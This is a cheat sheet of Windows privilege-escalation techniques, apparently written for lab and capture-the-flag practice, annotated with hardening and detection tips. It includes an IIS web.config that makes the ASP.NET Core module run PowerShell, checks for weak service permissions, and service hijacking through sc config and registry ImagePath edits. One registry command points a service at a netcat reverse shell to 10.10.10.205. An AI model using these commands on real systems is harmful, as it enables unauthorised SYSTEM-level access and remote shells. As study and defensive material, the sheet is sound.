Privilege Escalation
If you are able to edit or otherwise manipulate the file (here, an IIS web.config), you can use it to achieve remote command execution.
Vulnlab:
<?xml version="1.0" encoding="utf-8"?>
<!-- IIS web.config that repurposes the ASP.NET Core Module (ANCM): the module starts
     whatever executable processPath names, so this file makes IIS launch PowerShell
     instead of a web application. -->
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<!-- Maps every HTTP verb for the request path "execute.now" to AspNetCoreModuleV2. -->
<add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<!-- processPath + arguments form the command line the module runs out of process.
     "-e" is PowerShell's abbreviated EncodedCommand switch; "<Base64String>" is a
     placeholder (as written, the bare "<" is not valid inside an XML attribute value).
     Hardening: keep web.config and the site root writable only by administrators and the
     deployment identity; the application pool identity needs read access only.
     Detection: file-integrity monitoring on web.config, and process-creation alerts for
     the IIS worker (w3wp.exe) spawning powershell.exe or cmd.exe. -->
<aspNetCore processPath="powershell" arguments="-e <Base64String>" hostingModel="OutOfProcess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
# Audit weak service permissions with SharpUp ("audit" runs its checks and reports findings)
PS C:\htb> .\SharpUp.exe audit
# Search for weak service ACLs in the registry: list the keys under
# HKLM\System\CurrentControlSet\services that the account "mrb3n" can write to.
# accesschk switches: -k registry key, -w write access only, -s recurse,
# -u suppress errors, -v verbose, -q omit banner.
C:\htb> accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services
# Manual check: list services whose PathName is outside C:\Windows and does not start
# with a quote, i.e. unquoted service paths in third-party install locations.
Get-WmiObject -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select Name,DisplayName,StartMode,PathName | fl
# Check file or directory permissions: look for write/modify rights held by non-admin principals.
# Hardening: a service's install directory should be writable only by Administrators,
# SYSTEM and TrustedInstaller.
Get-ACL -Path 'C:\Program Files (x86)\IObit' | fl
# Check the service's configuration (dumps every Win32_Service property, including
# PathName, StartMode and the StartName account the service runs as)
Get-CimInstance -ClassName Win32_Service -Filter "Name = 'IObitUnSvr'" | Select-Object *
# Abuse: Write-ServiceBinary is a PowerUp function; -Command is left empty in this note.
# Detection: a changed hash or timestamp on a service executable, or a file write into the
# service directory by a process that is not the vendor's installer/updater.
Write-ServiceBinary -Name IObitUnSvr -Path "C:\Program Files (x86)\IObit\IObit.exe" -Command "" | fl
# Interact with the service (PowerShell cmdlets; the caller needs start/stop rights on the service)
Stop-Service -Name 'IObitUnSvr'
Start-Service -Name 'IObitUnSvr'
Restart-Service -Name 'IObitUnSvr'
# The same operations with sc.exe from cmd
C:\htb> sc start <ServiceName>
C:\htb> sc stop <ServiceName>
C:\htb> sc query <ServiceName>
# Reboot the machine: -r restarts rather than powers off, -t 0 sets no delay.
# Presumably here so that an auto-start service is launched again at boot.
shutdown -r -t 0
# Modify the service binPath (needs the change-config right on the service).
# The value is stored as ImagePath under the service's registry key, so the
# registry monitoring noted for the next command also covers this change.
C:\htb> sc config <ServiceName> binpath="COMMAND-HERE"
# Modify ImagePath directly in the registry (needs write access to the service's key).
# Detection: registry auditing (Security event 4657) or Sysmon Event ID 13 on
# HKLM\SYSTEM\CurrentControlSet\Services\*\ImagePath, alerting on values that point
# outside the expected install directory or into user-writable paths.
PS C:\htb> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"
# Example of replacing a service binary (only possible when the current user can write
# to the file; /Y overwrites without prompting)
C:\htb> cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"